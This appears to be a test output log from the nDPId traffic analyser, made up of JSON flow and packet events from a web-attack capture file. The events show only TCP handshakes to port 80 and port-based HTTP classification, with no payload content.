+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347446419,"flow_last_seen":1499347446419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347446419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1499347446419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oGtAAD4GJWWsEAABwKgKMt++AFBFYxsbAAAAAKACchBhzAAAAgQFtAQCCAoBOrtwAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1499347446420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ376sLltvRWMbHKAScSDKQgAAAgQFtAQCCAoD5IzmATq7cAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1499347446420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347446420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oGxAAD4GJWysEAABwKgKMt++AFBFYxscrC5bcIAQAOVpSQAAAQEICgE6u3ED5Izm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347447671,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347447671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XZhAAD4GaDisEAABwKgKMt\/MAFDFCOExAAAAAKACchAayQAAAgQFtAQCCAoBOrypAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ38yhpTp2xQjhMqAScSCtiAAAAgQFtAQCCAoD5I4fATq8qQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XZlAAD4GaD+sEAABwKgKMt\/MAFDFCOEyoaU6d4AQAOVMkAAAAQEICgE6vKkD5I4f"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347450180,"flow_last_seen":1499347450180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347450180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1499347450180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82VFAAD4G7H6sEAABwKgKMt\/mAFCGVWZMAAAAAKACchDR0wAAAgQFtAQCCAoBOr8dAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1499347450180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3+bg3FPQhlVmTaAScSAJjwAAAgQFtAQCCAoD5JCSATq\/HQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1499347450181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347450181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02VJAAD4G7IWsEAABwKgKMt\/mAFCGVWZN4NxT0YAQAOWolgAAAQEICgE6vx0D5JCS"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347451427,"flow_last_seen":1499347451427,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347451427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1499347451427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gftAAD4GQ9WsEAABwKgKMt\/0AFCzvkGvAAAAAKACchDHwgAAAgQFtAQCCAoBOsBUAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1499347451427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3\/Qj19JNs75BsKAScSA8zgAAAgQFtAQCCAoD5JHKATrAVAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1499347451428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347451428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gfxAAD4GQ9ysEAABwKgKMt\/0AFCzvkGwI9fSToAQAOXb1QAAAQEICgE6wFQD5JHK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347452731,"flow_last_seen":1499347452731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347452731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1499347452731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OxxAAD4GirSsEAABwKgKMuACAFCP5\/qGAAAAAKACchAxbgAAAgQFtAQCCAoBOsGaAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1499347452731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4AJ1f\/zHj+f6h6AScSApEQAAAgQFtAQCCAoD5JMQATrBmgEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1499347452732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347452732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ox1AAD4GirusEAABwKgKMuACAFCP5\/qHdX\/8yIAQAOXIGAAAAQEICgE6wZoD5JMQ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347455224,"flow_last_seen":1499347455224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1499347455224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z+5AAD4G9eGsEAABwKgKMuAcAFC7QQvkAAAAAKACchDyLAAAAgQFtAQCCAoBOsQKAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1499347455224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4BwGoR45u0EL5aAScSA0zgAAAgQFtAQCCAoD5JV\/ATrECgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1499347455225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347455225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z+9AAD4G9eisEAABwKgKMuAcAFC7QQvlBqEeOoAQAOXT1QAAAQEICgE6xAoD5JV\/"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347456462,"flow_last_seen":1499347456462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347456462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1499347456462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YWdAAD4GZGmsEAABwKgKMuAqAFCeBqRYAAAAAKACchB1sAAAAgQFtAQCCAoBOsU\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1499347456462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4CoPzfb\/ngakWaAScSDVKAAAAgQFtAQCCAoD5Ja1ATrFPwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1499347456463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347456463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YWhAAD4GZHCsEAABwKgKMuAqAFCeBqRZD833AIAQAOV0MAAAAQEICgE6xT8D5Ja1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347457705,"flow_last_seen":1499347457705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347457705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1499347457705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA816NAAD4G7iysEAABwKgKMuA4AFCwfBHVAAAAAKACchD0eAAAAgQFtAQCCAoBOsZ2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1499347457705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4DiBhHFpsHwR1qAScSBmmgAAAgQFtAQCCAoD5JfrATrGdgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1499347457706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347457706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA016RAAD4G7jOsEAABwKgKMuA4AFCwfBHWgYRxaoAQAOUFogAAAQEICgE6xnYD5Jfr"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347460253,"flow_last_seen":1499347460253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347460253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1499347460253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eW5AAD4GTGKsEAABwKgKMuBSAFDnp7GdAAAAAKACchAa7gAAAgQFtAQCCAoBOsjzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1499347460253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4FLH4MUu56exnqAScSDwcAAAAgQFtAQCCAoD5JpoATrI8wEDAwc="} 